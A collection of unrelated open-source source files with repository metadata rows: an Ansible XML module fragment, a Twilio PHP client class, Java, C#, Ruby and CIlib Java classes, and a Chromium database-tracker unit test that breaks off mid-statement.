module.fail_json(msg="Evaluation error in xpath expression: %s (%s)" % (xpath, e))
# Try to parse in the target XML file
try:
parser = etree.XMLParser(remove_blank_text=pretty_print, strip_cdata=strip_cdata_tags)
doc = etree.parse(infile, parser)
except etree.XMLSyntaxError as e:
module.fail_json(msg="Error while parsing document: %s (%s)" % (xml_file or 'xml_string', e))
# Ensure we have the original copy to compare
global orig_doc
orig_doc = copy.deepcopy(doc)
if print_match:
do_print_match(module, doc, xpath, namespaces)
if count:
count_nodes(module, doc, xpath, namespaces)
if content == 'attribute':
get_element_attr(module, doc, xpath, namespaces)
elif content == 'text':
get_element_text(module, doc, xpath, namespaces)
# File exists:
if state == 'absent':
# - absent: delete xpath target
delete_xpath_target(module, doc, xpath, namespaces)
# - present: carry on
# children && value both set?: should have already aborted by now
# add_children && set_children both set?: should have already aborted by now
# set_children set?
if set_children:
set_target_children(module, doc, xpath, namespaces, set_children, input_type)
# add_children set?
if add_children:
add_target_children(module, doc, xpath, namespaces, add_children, input_type, insertbefore, insertafter)
# No?: Carry on
# Is the xpath target an attribute selector?
if value is not None:
set_target(module, doc, xpath, namespaces, attribute, value)
# If an xpath was provided, we need to do something with the data
if xpath is not None:
ensure_xpath_exists(module, doc, xpath, namespaces)
# Otherwise only reformat the xml data?
if pretty_print:
make_pretty(module, doc)
module.fail_json(msg="Don't know what to do")
if __name__ == '__main__':
main()
| valentin-krasontovitsch/ansible | lib/ansible/modules/files/xml.py | Python | gpl-3.0 | 35,343 |
<?php
/**
* This code was generated by
* \ / _ _ _| _ _
* | (_)\/(_)(_|\/| |(/_ v1.0.0
* / /
*/
namespace Twilio\Rest\Taskrouter\V1\Workspace;
use Twilio\ListResource;
use Twilio\Options;
use Twilio\Values;
use Twilio\Version;
class WorkflowList extends ListResource {
/**
* Construct the WorkflowList
*
* @param Version $version Version that contains the resource
* @param string $workspaceSid The workspace_sid
* @return \Twilio\Rest\Taskrouter\V1\Workspace\WorkflowList
*/
public function __construct(Version $version, $workspaceSid) {
parent::__construct($version);
// Path Solution
$this->solution = array(
'workspaceSid' => $workspaceSid,
);
$this->uri = '/Workspaces/' . rawurlencode($workspaceSid) . '/Workflows';
}
/**
* Streams WorkflowInstance records from the API as a generator stream.
* This operation lazily loads records as efficiently as possible until the
* limit
* is reached.
* The results are returned as a generator, so this operation is memory
* efficient.
*
* @param array|Options $options Optional Arguments
* @param int $limit Upper limit for the number of records to return. stream()
* guarantees to never return more than limit. Default is no
* limit
* @param mixed $pageSize Number of records to fetch per request, when not set
* will use the default value of 50 records. If no
* page_size is defined but a limit is defined, stream()
* will attempt to read the limit with the most
* efficient page size, i.e. min(limit, 1000)
* @return \Twilio\Stream stream of results
*/
public function stream($options = array(), $limit = null, $pageSize = null) {
$limits = $this->version->readLimits($limit, $pageSize);
$page = $this->page($options, $limits['pageSize']);
return $this->version->stream($page, $limits['limit'], $limits['pageLimit']);
}
/**
* Reads WorkflowInstance records from the API as a list.
* Unlike stream(), this operation is eager and will load `limit` records into
* memory before returning.
*
* @param array|Options $options Optional Arguments
* @param int $limit Upper limit for the number of records to return. read()
* guarantees to never return more than limit. Default is no
* limit
* @param mixed $pageSize Number of records to fetch per request, when not set
* will use the default value of 50 records. If no
* page_size is defined but a limit is defined, read()
* will attempt to read the limit with the most
* efficient page size, i.e. min(limit, 1000)
* @return WorkflowInstance[] Array of results
*/
public function read($options = array(), $limit = null, $pageSize = Values::NONE) {
return iterator_to_array($this->stream($options, $limit, $pageSize), false);
}
/**
* Retrieve a single page of WorkflowInstance records from the API.
* Request is executed immediately
*
* @param array|Options $options Optional Arguments
* @param mixed $pageSize Number of records to return, defaults to 50
* @param string $pageToken PageToken provided by the API
* @param mixed $pageNumber Page Number, this value is simply for client state
* @return \Twilio\Page Page of WorkflowInstance
*/
public function page($options = array(), $pageSize = Values::NONE, $pageToken = Values::NONE, $pageNumber = Values::NONE) {
$options = new Values($options);
$params = Values::of(array(
'FriendlyName' => $options['friendlyName'],
'PageToken' => $pageToken,
'Page' => $pageNumber,
'PageSize' => $pageSize,
));
$response = $this->version->page(
'GET',
$this->uri,
$params
);
return new WorkflowPage($this->version, $response, $this->solution);
}
/**
* Create a new WorkflowInstance
*
* @param string $friendlyName The friendly_name
* @param string $configuration The configuration
* @param array|Options $options Optional Arguments
* @return WorkflowInstance Newly created WorkflowInstance
*/
public function create($friendlyName, $configuration, $options = array()) {
$options = new Values($options);
$data = Values::of(array(
'FriendlyName' => $friendlyName,
'Configuration' => $configuration,
'AssignmentCallbackUrl' => $options['assignmentCallbackUrl'],
'FallbackAssignmentCallbackUrl' => $options['fallbackAssignmentCallbackUrl'],
'TaskReservationTimeout' => $options['taskReservationTimeout'],
));
$payload = $this->version->create(
'POST',
$this->uri,
array(),
$data
);
return new WorkflowInstance(
$this->version,
$payload,
$this->solution['workspaceSid']
);
}
/**
* Constructs a WorkflowContext
*
* @param string $sid The sid
* @return \Twilio\Rest\Taskrouter\V1\Workspace\WorkflowContext
*/
public function getContext($sid) {
return new WorkflowContext(
$this->version,
$this->solution['workspaceSid'],
$sid
);
}
/**
* Provide a friendly representation
*
* @return string Machine friendly representation
*/
public function __toString() {
return '[Twilio.Taskrouter.V1.WorkflowList]';
}
} | ggerman/twilionClient | vendor/twilio/sdk/Twilio/Rest/Taskrouter/V1/Workspace/WorkflowList.php | PHP | gpl-3.0 | 5,983 |
package org.overture.interpreter.messages.rtlog.nextgen;
import java.io.Serializable;
public class NextGenThread implements Serializable
{
/**
*
*/
private static final long serialVersionUID = 4292041684803164404L;
public enum ThreadType
{
INIT, MAIN, OBJECT
}
public Long id;
public NextGenObject object;
public NextGenCpu cpu;
public boolean periodic;
public ThreadType type;
public NextGenThread(long id, NextGenCpu cpu, NextGenObject object,
boolean periodic, ThreadType type)
{
this.id = id;
this.cpu = cpu;
this.object = object;
this.periodic = periodic;
this.type = type;
}
@Override
public String toString()
{
StringBuffer s = new StringBuffer();
s.append("Thread -> ");
s.append("id: ");
s.append(this.id);
s.append(" periodic: ");
s.append(this.periodic);
s.append(" cpuid: ");
s.append(this.cpu.id);
s.append(" type: ");
s.append(this.type);
return s.toString();
}
}
| KlapZaZa/overture | core/interpreter/src/main/java/org/overture/interpreter/messages/rtlog/nextgen/NextGenThread.java | Java | gpl-3.0 | 946 |
#region License
// ====================================================
// Project Porcupine Copyright(C) 2016 Team Porcupine
// This program comes with ABSOLUTELY NO WARRANTY; This is free software,
// and you are welcome to redistribute it under certain conditions; See
// file LICENSE, which is part of this source code package, for details.
// ====================================================
#endregion
using System.Collections.Generic;
using System.Linq;
using System.Xml;
using UnityEngine;
public class TraderPrototype : IPrototypable
{
private float rarity;
public string Type { get; set; }
public List<string> PotentialNames { get; set; }
public float MinCurrencyBalance { get; set; }
public float MaxCurrencyBalance { get; set; }
public string CurrencyName { get; set; }
public float MinSaleMarginMultiplier { get; set; }
public float MaxSaleMarginMultiplier { get; set; }
public List<TraderPotentialInventory> PotentialStock { get; set; }
/// <summary>
/// Value from 0 to 1, higher value represent higher availability of the trade resource.
/// </summary>
public float Rarity
{
get
{
return rarity;
}
set
{
rarity = Mathf.Clamp(value, 0f, 1f);
}
}
public void ReadXmlPrototype(XmlReader reader_parent)
{
Type = reader_parent.GetAttribute("type");
XmlReader reader = reader_parent.ReadSubtree();
while (reader.Read())
{
switch (reader.Name)
{
case "potentialNames":
PotentialNames = new List<string>();
XmlReader namesReader = reader.ReadSubtree();
while (namesReader.Read())
{
if (namesReader.Name == "name")
{
PotentialNames.Add(namesReader.ReadElementContentAsString());
}
}
break;
case "currencyName":
reader.Read();
CurrencyName = reader.ReadContentAsString();
break;
case "minCurrencyBalance":
reader.Read();
MinCurrencyBalance = reader.ReadContentAsInt();
break;
case "maxCurrencyBalance":
reader.Read();
MaxCurrencyBalance = reader.ReadContentAsInt();
break;
case "minSaleMarginMultiplier":
reader.Read();
MinSaleMarginMultiplier = reader.ReadContentAsFloat();
break;
case "maxSaleMarginMultiplier":
reader.Read();
MaxSaleMarginMultiplier = reader.ReadContentAsFloat();
break;
case "potentialStock":
PotentialStock = new List<TraderPotentialInventory>();
XmlReader invs_reader = reader.ReadSubtree();
while (invs_reader.Read())
{
if (invs_reader.Name == "Inventory")
{
// Found an inventory requirement, so add it to the list!
PotentialStock.Add(new TraderPotentialInventory
{
Type = invs_reader.GetAttribute("type"),
Category = invs_reader.GetAttribute("category"),
MinQuantity = int.Parse(invs_reader.GetAttribute("minQuantity")),
MaxQuantity = int.Parse(invs_reader.GetAttribute("maxQuantity")),
Rarity = float.Parse(invs_reader.GetAttribute("rarity"))
});
}
}
break;
}
}
}
/// <summary>
/// Create a random Trader out of this TraderPrototype.
/// </summary>
public Trader CreateTrader()
{
Trader t = new Trader
{
Currency = new Currency
{
Name = CurrencyName,
Balance = Random.Range(MinCurrencyBalance, MaxCurrencyBalance),
ShortName = World.Current.Wallet.Currencies[CurrencyName].ShortName
},
Name = PotentialNames[Random.Range(0, PotentialNames.Count - 1)],
SaleMarginMultiplier = Random.Range(MinSaleMarginMultiplier, MaxSaleMarginMultiplier),
Stock = new List<Inventory>()
};
foreach (TraderPotentialInventory potentialStock in PotentialStock)
{
bool itemIsInStock = Random.Range(0f, 1f) > potentialStock.Rarity;
if (itemIsInStock)
{
if (!string.IsNullOrEmpty(potentialStock.Type))
{
Inventory inventory = new Inventory(
potentialStock.Type,
Random.Range(potentialStock.MinQuantity, potentialStock.MaxQuantity));
t.Stock.Add(inventory);
}
else if (!string.IsNullOrEmpty(potentialStock.Category))
{
List<InventoryCommon> potentialObjects = GetInventoryCommonWithCategory(potentialStock.Category);
foreach (InventoryCommon potentialObject in potentialObjects)
{
Inventory inventory = new Inventory(
potentialObject.type,
Random.Range(potentialStock.MinQuantity, potentialStock.MaxQuantity));
t.Stock.Add(inventory);
}
}
}
}
return t;
}
private List<InventoryCommon> GetInventoryCommonWithCategory(string category)
{
return PrototypeManager.Inventory.Values.Where(i => i.category == category).ToList();
}
}
| therealjefe/ProjectPorcupine | Assets/Scripts/Models/Trade/TraderPrototype.cs | C# | gpl-3.0 | 6,137 |
# frozen_string_literal: true
module RuboCop
module Cop
module Style
# This cop checks against comparing a variable with multiple items, where
# `Array#include?`, `Set#include?` or a `case` could be used instead
# to avoid code repetition.
# It accepts comparisons of multiple method calls to avoid unnecessary method calls
# by default. It can be configured by `AllowMethodComparison` option.
#
# @example
# # bad
# a = 'a'
# foo if a == 'a' || a == 'b' || a == 'c'
#
# # good
# a = 'a'
# foo if ['a', 'b', 'c'].include?(a)
#
# VALUES = Set['a', 'b', 'c'].freeze
# # elsewhere...
# foo if VALUES.include?(a)
#
# case foo
# when 'a', 'b', 'c' then foo
# # ...
# end
#
# # accepted (but consider `case` as above)
# foo if a == b.lightweight || a == b.heavyweight
#
# @example AllowMethodComparison: true (default)
# # good
# foo if a == b.lightweight || a == b.heavyweight
#
# @example AllowMethodComparison: false
# # bad
# foo if a == b.lightweight || a == b.heavyweight
#
# # good
# foo if [b.lightweight, b.heavyweight].include?(a)
class MultipleComparison < Base
extend AutoCorrector
MSG = 'Avoid comparing a variable with multiple items ' \
'in a conditional, use `Array#include?` instead.'
def on_new_investigation
@last_comparison = nil
end
def on_or(node)
reset_comparison if switch_comparison?(node)
root_of_or_node = root_of_or_node(node)
return unless node == root_of_or_node
return unless nested_variable_comparison?(root_of_or_node)
return if @allowed_method_comparison
add_offense(node) do |corrector|
elements = @compared_elements.join(', ')
prefer_method = "[#{elements}].include?(#{variables_in_node(node).first})"
corrector.replace(node, prefer_method)
end
@last_comparison = node
end
private
# @!method simple_double_comparison?(node)
def_node_matcher :simple_double_comparison?, '(send $lvar :== $lvar)'
# @!method simple_comparison_lhs?(node)
def_node_matcher :simple_comparison_lhs?, <<~PATTERN
(send $lvar :== $_)
PATTERN
# @!method simple_comparison_rhs?(node)
def_node_matcher :simple_comparison_rhs?, <<~PATTERN
(send $_ :== $lvar)
PATTERN
def nested_variable_comparison?(node)
return false unless nested_comparison?(node)
variables_in_node(node).count == 1
end
def variables_in_node(node)
if node.or_type?
node.node_parts.flat_map { |node_part| variables_in_node(node_part) }.uniq
else
variables_in_simple_node(node)
end
end
def variables_in_simple_node(node)
simple_double_comparison?(node) do |var1, var2|
return [variable_name(var1), variable_name(var2)]
end
if (var, obj = simple_comparison_lhs?(node)) || (obj, var = simple_comparison_rhs?(node))
@allowed_method_comparison = true if allow_method_comparison? && obj.send_type?
@compared_elements << obj.source
return [variable_name(var)]
end
[]
end
def variable_name(node)
node.children[0]
end
def nested_comparison?(node)
if node.or_type?
node.node_parts.all? { |node_part| comparison? node_part }
else
false
end
end
def comparison?(node)
simple_comparison_lhs?(node) || simple_comparison_rhs?(node) || nested_comparison?(node)
end
def root_of_or_node(or_node)
return or_node unless or_node.parent
if or_node.parent.or_type?
root_of_or_node(or_node.parent)
else
or_node
end
end
def switch_comparison?(node)
return true if @last_comparison.nil?
@last_comparison.descendants.none?(node)
end
def reset_comparison
@compared_elements = []
@allowed_method_comparison = false
end
def allow_method_comparison?
cop_config.fetch('AllowMethodComparison', true)
end
end
end
end
end
| BeGe78/esood | vendor/bundle/ruby/3.0.0/gems/rubocop-1.18.3/lib/rubocop/cop/style/multiple_comparison.rb | Ruby | gpl-3.0 | 4,568 |
/** __ __
* _____ _/ /_/ /_ Computational Intelligence Library (CIlib)
* / ___/ / / / __ \ (c) CIRG @ UP
* / /__/ / / / /_/ / http://cilib.net
* \___/_/_/_/_.___/
*/
package net.sourceforge.cilib.functions.continuous.dynamic.moo.fda2mod_deb;
import net.sourceforge.cilib.algorithm.AbstractAlgorithm;
import net.sourceforge.cilib.functions.ContinuousFunction;
import net.sourceforge.cilib.problem.FunctionOptimisationProblem;
import net.sourceforge.cilib.type.types.container.Vector;
/**
* This function is the h function of the FDA2_mod problem defined in the
* following paper: K. Deb, U. Rao N and S. Karthik. Dynamic Multi-objective
* optimization and decision making using modified NSGA-II: A case study on
* hydro-thermal power scheduling, In Proceedings of the International
* Conference on Evolutionary Multi-Criterion Optimization (EMO), Lecture Notes
* in Computer Science, 4403:803-817, Springer-Verlag Berlin/Heidelberg, 2007.
*
*/
public class FDA2_h extends ContinuousFunction {
private static final long serialVersionUID = -637862405309737323L;
//members
ContinuousFunction fda2_f;
ContinuousFunction fda2_g;
FunctionOptimisationProblem fda2_f_problem;
FunctionOptimisationProblem fda2_g_problem;
//number of generations for which t remains fixed
private int tau_t;
//generation counter
private int tau;
//number of distinct steps in t
private int n_t;
//maximum number of iterations
private int tau_max;
/**
* Creates a new instance of FDA2_h.
*/
public FDA2_h() {
//initialize the members
this.tau_t = 5;
this.tau = 1;
this.n_t = 1;
this.tau_max = 200;
}
/**
* Sets the f1 function with a specified problem.
* @param problem FunctionOptimisationProblem used for the f1 function.
*/
public void setFDA2_f(FunctionOptimisationProblem problem) {
this.fda2_f_problem = problem;
this.fda2_f = (ContinuousFunction) problem.getFunction();
}
/**
* Returns the problem used to set the f1 function.
* @return fda2_f_problem FunctionOptimisationProblem used for the f1
* function.
*/
public FunctionOptimisationProblem getFDA2_f_problem() {
return this.fda2_f_problem;
}
/**
* Sets the f1 function that is used in the FDA2 problem without specifying
* the problem.
* @param fda2_f ContinuousFunction used for the f1 function.
*/
public void setFDA2_f(ContinuousFunction fda2_f) {
this.fda2_f = fda2_f;
}
/**
* Returns the f1 function that is used in the FDA2 problem.
* @return fda2_f ContinuousFunction used for the f1 function.
*/
public ContinuousFunction getFDA2_f() {
return this.fda2_f;
}
/**
* Sets the g function with a specified problem.
* @param problem FunctionOptimisationProblem used for the g function.
*/
public void setFDA2_g(FunctionOptimisationProblem problem) {
this.fda2_g_problem = problem;
this.fda2_g = (ContinuousFunction) problem.getFunction();
}
/**
* Returns the problem used to set the g function.
* @return fda2_g_problem FunctionOptimisationProblem used for the g
* function.
*/
public FunctionOptimisationProblem getFDA2_g_problem() {
return this.fda2_g_problem;
}
/**
* Sets the g function that is used in the FDA2 problem without specifying
* the problem.
* @param fda2_g ContinuousFunction used for the g function.
*/
public void setFDA2_g(ContinuousFunction fda2_g) {
this.fda2_g = fda2_g;
}
/**
* Returns the g function that is used in the FDA2 problem.
* @return fda2_g ContinuousFunction used for the g function.
*/
public ContinuousFunction getFDA2_g() {
return this.fda2_g;
}
/**
* Sets the iteration number.
* @param tau Iteration number.
*/
public void setTau(int tau) {
this.tau = tau;
}
/**
* Returns the iteration number.
* @return tau Iteration number.
*/
public int getTau() {
return this.tau;
}
/**
* Sets the frequency of change.
* @param tau_t Change frequency.
*/
public void setTau_t(int tau_t) {
this.tau_t = tau_t;
}
/**
* Returns the frequency of change.
* @return tau_t Change frequency.
*/
public int getTau_t() {
return this.tau_t;
}
/**
* Sets the severity of change.
* @param n_t Change severity.
*/
public void setN_t(int n_t) {
this.n_t = n_t;
}
/**
* Returns the severity of change.
* @return n_t Change severity.
*/
public int getN_t() {
return this.n_t;
}
/**
* Evaluates the function.
*/
@Override
public Double f(Vector x) {
this.tau = AbstractAlgorithm.get().getIterations();
return this.apply(this.tau, x);
}
/**
* Evaluates the function for a specific iteration.
*
*/
public Double apply(int iteration, Vector x) {
double t_old = (1.0 / (double) n_t) * 2.0 * Math.floor((double) (iteration - 1.0) / (double) this.tau_t) * (this.tau_t / (this.tau_max - this.tau_t));
double H = 2.0 * (Math.sin(0.5 * Math.PI * t_old));
Vector xI = x;
Vector xII = x;
Vector xIII = x;
if (x.size() > 1) {
xI = x.copyOfRange(0, 1);
xII = x.copyOfRange(1, 6);
xIII = x.copyOfRange(6, x.size());
}
double f = this.fda2_f.f(xI);
double g = this.fda2_g.f(xII);
double value = 1.0;
double power = H;
for (int k = 0; k < xIII.size(); k++) {
power += Math.pow(xIII.doubleValueOf(k) - (H / 4.0), 2);
}
double f_div_g = Math.pow((double) f / (double) g, 2.0);
value -= Math.pow(f_div_g, power);
return value;
}
}
| krharrison/cilib | library/src/main/java/net/sourceforge/cilib/functions/continuous/dynamic/moo/fda2mod_deb/FDA2_h.java | Java | gpl-3.0 | 6,011 |
// Copyright 2014 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include <stddef.h>
#include <stdint.h>
#include <memory>
#include "base/files/file.h"
#include "base/files/file_path.h"
#include "base/files/file_util.h"
#include "base/files/scoped_temp_dir.h"
#include "base/message_loop/message_loop.h"
#include "base/strings/utf_string_conversions.h"
#include "base/threading/thread_task_runner_handle.h"
#include "base/time/time.h"
#include "content/public/test/mock_special_storage_policy.h"
#include "net/base/net_errors.h"
#include "net/base/test_completion_callback.h"
#include "storage/browser/database/database_tracker.h"
#include "storage/browser/quota/quota_manager_proxy.h"
#include "storage/common/database/database_identifier.h"
#include "testing/gtest/include/gtest/gtest.h"
#include "third_party/sqlite/sqlite3.h"
using base::ASCIIToUTF16;
using storage::DatabaseConnections;
using storage::DatabaseTracker;
using storage::OriginInfo;
namespace {
const char kOrigin1Url[] = "http://origin1";
const char kOrigin2Url[] = "http://protected_origin2";
class TestObserver : public storage::DatabaseTracker::Observer {
public:
TestObserver()
: new_notification_received_(false),
observe_size_changes_(true),
observe_scheduled_deletions_(true) {
}
TestObserver(bool observe_size_changes, bool observe_scheduled_deletions)
: new_notification_received_(false),
observe_size_changes_(observe_size_changes),
observe_scheduled_deletions_(observe_scheduled_deletions) {
}
~TestObserver() override {}
void OnDatabaseSizeChanged(const std::string& origin_identifier,
const base::string16& database_name,
int64_t database_size) override {
if (!observe_size_changes_)
return;
new_notification_received_ = true;
origin_identifier_ = origin_identifier;
database_name_ = database_name;
database_size_ = database_size;
}
void OnDatabaseScheduledForDeletion(
const std::string& origin_identifier,
const base::string16& database_name) override {
if (!observe_scheduled_deletions_)
return;
new_notification_received_ = true;
origin_identifier_ = origin_identifier;
database_name_ = database_name;
}
bool DidReceiveNewNotification() {
bool temp_new_notification_received = new_notification_received_;
new_notification_received_ = false;
return temp_new_notification_received;
}
std::string GetNotificationOriginIdentifier() {
return origin_identifier_;
}
base::string16 GetNotificationDatabaseName() { return database_name_; }
int64_t GetNotificationDatabaseSize() { return database_size_; }
private:
bool new_notification_received_;
bool observe_size_changes_;
bool observe_scheduled_deletions_;
std::string origin_identifier_;
base::string16 database_name_;
int64_t database_size_;
};
void CheckNotificationReceived(TestObserver* observer,
const std::string& expected_origin_identifier,
const base::string16& expected_database_name,
int64_t expected_database_size) {
EXPECT_TRUE(observer->DidReceiveNewNotification());
EXPECT_EQ(expected_origin_identifier,
observer->GetNotificationOriginIdentifier());
EXPECT_EQ(expected_database_name,
observer->GetNotificationDatabaseName());
EXPECT_EQ(expected_database_size,
observer->GetNotificationDatabaseSize());
}
class TestQuotaManagerProxy : public storage::QuotaManagerProxy {
public:
TestQuotaManagerProxy()
: QuotaManagerProxy(NULL, NULL),
registered_client_(NULL) {
}
void RegisterClient(storage::QuotaClient* client) override {
EXPECT_FALSE(registered_client_);
registered_client_ = client;
}
void NotifyStorageAccessed(storage::QuotaClient::ID client_id,
const GURL& origin,
storage::StorageType type) override {
EXPECT_EQ(storage::QuotaClient::kDatabase, client_id);
EXPECT_EQ(storage::kStorageTypeTemporary, type);
accesses_[origin] += 1;
}
void NotifyStorageModified(storage::QuotaClient::ID client_id,
const GURL& origin,
storage::StorageType type,
int64_t delta) override {
EXPECT_EQ(storage::QuotaClient::kDatabase, client_id);
EXPECT_EQ(storage::kStorageTypeTemporary, type);
modifications_[origin].first += 1;
modifications_[origin].second += delta;
}
// Not needed for our tests.
void NotifyOriginInUse(const GURL& origin) override {}
void NotifyOriginNoLongerInUse(const GURL& origin) override {}
void SetUsageCacheEnabled(storage::QuotaClient::ID client_id,
const GURL& origin,
storage::StorageType type,
bool enabled) override {}
void GetUsageAndQuota(base::SequencedTaskRunner* original_task_runner,
const GURL& origin,
storage::StorageType type,
const GetUsageAndQuotaCallback& callback) override {}
void SimulateQuotaManagerDestroyed() {
if (registered_client_) {
registered_client_->OnQuotaManagerDestroyed();
registered_client_ = NULL;
}
}
bool WasAccessNotified(const GURL& origin) {
return accesses_[origin] != 0;
}
bool WasModificationNotified(const GURL& origin, int64_t amount) {
return modifications_[origin].first != 0 &&
modifications_[origin].second == amount;
}
void reset() {
accesses_.clear();
modifications_.clear();
}
storage::QuotaClient* registered_client_;
// Map from origin to count of access notifications.
std::map<GURL, int> accesses_;
// Map from origin to <count, sum of deltas>
std::map<GURL, std::pair<int, int64_t>> modifications_;
protected:
~TestQuotaManagerProxy() override { EXPECT_FALSE(registered_client_); }
};
bool EnsureFileOfSize(const base::FilePath& file_path, int64_t length) {
base::File file(file_path,
base::File::FLAG_OPEN_ALWAYS | base::File::FLAG_WRITE);
if (!file.IsValid())
return false;
return file.SetLength(length);
}
} // namespace
namespace content {
// We declare a helper class, and make it a friend of DatabaseTracker using
// the FORWARD_DECLARE_TEST macro, and we implement all tests we want to run as
// static methods of this class. Then we make our TEST() targets call these
// static functions. This allows us to run each test in normal mode and
// incognito mode without writing the same code twice.
class DatabaseTracker_TestHelper_Test {
public:
static void TestDeleteOpenDatabase(bool incognito_mode) {
// Initialize the tracker database.
base::ScopedTempDir temp_dir;
ASSERT_TRUE(temp_dir.CreateUniqueTempDir());
scoped_refptr<MockSpecialStoragePolicy> special_storage_policy =
new MockSpecialStoragePolicy;
special_storage_policy->AddProtected(GURL(kOrigin2Url));
scoped_refptr<DatabaseTracker> tracker(
new DatabaseTracker(temp_dir.GetPath(), incognito_mode,
special_storage_policy.get(), NULL, NULL));
// Create and open three databases.
int64_t database_size = 0;
const std::string kOrigin1 =
storage::GetIdentifierFromOrigin(GURL(kOrigin1Url));
const std::string kOrigin2 =
storage::GetIdentifierFromOrigin(GURL(kOrigin2Url));
const base::string16 kDB1 = ASCIIToUTF16("db1");
const base::string16 kDB2 = ASCIIToUTF16("db2");
const base::string16 kDB3 = ASCIIToUTF16("db3");
const base::string16 kDescription = ASCIIToUTF16("database_description");
tracker->DatabaseOpened(kOrigin1, kDB1, kDescription, 0,
&database_size);
tracker->DatabaseOpened(kOrigin2, kDB2, kDescription, 0,
&database_size);
tracker->DatabaseOpened(kOrigin2, kDB3, kDescription, 0,
&database_size);
EXPECT_TRUE(base::CreateDirectory(
tracker->DatabaseDirectory().Append(base::FilePath::FromUTF16Unsafe(
tracker->GetOriginDirectory(kOrigin1)))));
EXPECT_TRUE(base::CreateDirectory(
tracker->DatabaseDirectory().Append(base::FilePath::FromUTF16Unsafe(
tracker->GetOriginDirectory(kOrigin2)))));
EXPECT_EQ(1, base::WriteFile(
tracker->GetFullDBFilePath(kOrigin1, kDB1), "a", 1));
EXPECT_EQ(2, base::WriteFile(
tracker->GetFullDBFilePath(kOrigin2, kDB2), "aa", 2));
EXPECT_EQ(3, base::WriteFile(
tracker->GetFullDBFilePath(kOrigin2, kDB3), "aaa", 3));
tracker->DatabaseModified(kOrigin1, kDB1);
tracker->DatabaseModified(kOrigin2, kDB2);
tracker->DatabaseModified(kOrigin2, kDB3);
// Delete db1. Should also delete origin1.
TestObserver observer;
tracker->AddObserver(&observer);
net::TestCompletionCallback callback;
int result = tracker->DeleteDatabase(kOrigin1, kDB1, callback.callback());
EXPECT_EQ(net::ERR_IO_PENDING, result);
ASSERT_FALSE(callback.have_result());
EXPECT_TRUE(observer.DidReceiveNewNotification());
EXPECT_EQ(kOrigin1, observer.GetNotificationOriginIdentifier());
EXPECT_EQ(kDB1, observer.GetNotificationDatabaseName());
tracker->DatabaseClosed(kOrigin1, kDB1);
result = callback.GetResult(result);
EXPECT_EQ(net::OK, result);
EXPECT_FALSE(base::PathExists(
tracker->DatabaseDirectory().AppendASCII(kOrigin1)));
// Recreate db1.
tracker->DatabaseOpened(kOrigin1, kDB1, kDescription, 0,
&database_size);
EXPECT_TRUE(base::CreateDirectory(
tracker->DatabaseDirectory().Append(base::FilePath::FromUTF16Unsafe(
tracker->GetOriginDirectory(kOrigin1)))));
EXPECT_EQ(1, base::WriteFile(
tracker->GetFullDBFilePath(kOrigin1, kDB1), "a", 1));
tracker->DatabaseModified(kOrigin1, kDB1);
// Setup file modification times. db1 and db2 are modified now, db3 three
// days ago.
base::Time now = base::Time::Now();
EXPECT_TRUE(base::TouchFile(tracker->GetFullDBFilePath(kOrigin1, kDB1),
now, now));
EXPECT_TRUE(base::TouchFile(tracker->GetFullDBFilePath(kOrigin2, kDB2),
now, now));
base::Time three_days_ago = now - base::TimeDelta::FromDays(3);
EXPECT_TRUE(base::TouchFile(tracker->GetFullDBFilePath(kOrigin2, kDB3),
three_days_ago, three_days_ago));
// Delete databases modified since yesterday. db2 is whitelisted.
base::Time yesterday = base::Time::Now();
yesterday -= base::TimeDelta::FromDays(1);
result = tracker->DeleteDataModifiedSince(
yesterday, callback.callback());
EXPECT_EQ(net::ERR_IO_PENDING, result);
ASSERT_FALSE(callback.have_result());
EXPECT_TRUE(observer.DidReceiveNewNotification());
tracker->DatabaseClosed(kOrigin1, kDB1);
tracker->DatabaseClosed(kOrigin2, kDB2);
result = callback.GetResult(result);
EXPECT_EQ(net::OK, result);
EXPECT_FALSE(base::PathExists(
tracker->DatabaseDirectory().AppendASCII(kOrigin1)));
EXPECT_TRUE(
base::PathExists(tracker->GetFullDBFilePath(kOrigin2, kDB2)));
EXPECT_TRUE(
base::PathExists(tracker->GetFullDBFilePath(kOrigin2, kDB3)));
tracker->DatabaseClosed(kOrigin2, kDB3);
tracker->RemoveObserver(&observer);
}
static void TestDatabaseTracker(bool incognito_mode) {
// Initialize the tracker database.
base::ScopedTempDir temp_dir;
ASSERT_TRUE(temp_dir.CreateUniqueTempDir());
scoped_refptr<MockSpecialStoragePolicy> special_storage_policy =
new MockSpecialStoragePolicy;
special_storage_policy->AddProtected(GURL(kOrigin2Url));
scoped_refptr<DatabaseTracker> tracker(
new DatabaseTracker(temp_dir.GetPath(), incognito_mode,
special_storage_policy.get(), NULL, NULL));
// Add two observers.
TestObserver observer1;
TestObserver observer2;
tracker->AddObserver(&observer1);
tracker->AddObserver(&observer2);
// Open three new databases.
int64_t database_size = 0;
const std::string kOrigin1 =
storage::GetIdentifierFromOrigin(GURL(kOrigin1Url));
const std::string kOrigin2 =
storage::GetIdentifierFromOrigin(GURL(kOrigin2Url));
const base::string16 kDB1 = ASCIIToUTF16("db1");
const base::string16 kDB2 = ASCIIToUTF16("db2");
const base::string16 kDB3 = ASCIIToUTF16("db3");
const base::string16 kDescription = ASCIIToUTF16("database_description");
// Get the info for kOrigin1 and kOrigin2
DatabaseTracker::CachedOriginInfo* origin1_info =
tracker->GetCachedOriginInfo(kOrigin1);
DatabaseTracker::CachedOriginInfo* origin2_info =
tracker->GetCachedOriginInfo(kOrigin1);
EXPECT_TRUE(origin1_info);
EXPECT_TRUE(origin2_info);
tracker->DatabaseOpened(kOrigin1, kDB1, kDescription, 0,
&database_size);
EXPECT_EQ(0, database_size);
tracker->DatabaseOpened(kOrigin2, kDB2, kDescription, 0,
&database_size);
EXPECT_EQ(0, database_size);
tracker->DatabaseOpened(kOrigin1, kDB3, kDescription, 0,
&database_size);
EXPECT_EQ(0, database_size);
// Write some data to each file and check that the listeners are
// called with the appropriate values.
EXPECT_TRUE(base::CreateDirectory(
tracker->DatabaseDirectory().Append(base::FilePath::FromUTF16Unsafe(
tracker->GetOriginDirectory(kOrigin1)))));
EXPECT_TRUE(base::CreateDirectory(
tracker->DatabaseDirectory().Append(base::FilePath::FromUTF16Unsafe(
tracker->GetOriginDirectory(kOrigin2)))));
EXPECT_EQ(1, base::WriteFile(
tracker->GetFullDBFilePath(kOrigin1, kDB1), "a", 1));
EXPECT_EQ(2, base::WriteFile(
tracker->GetFullDBFilePath(kOrigin2, kDB2), "aa", 2));
EXPECT_EQ(4, base::WriteFile(
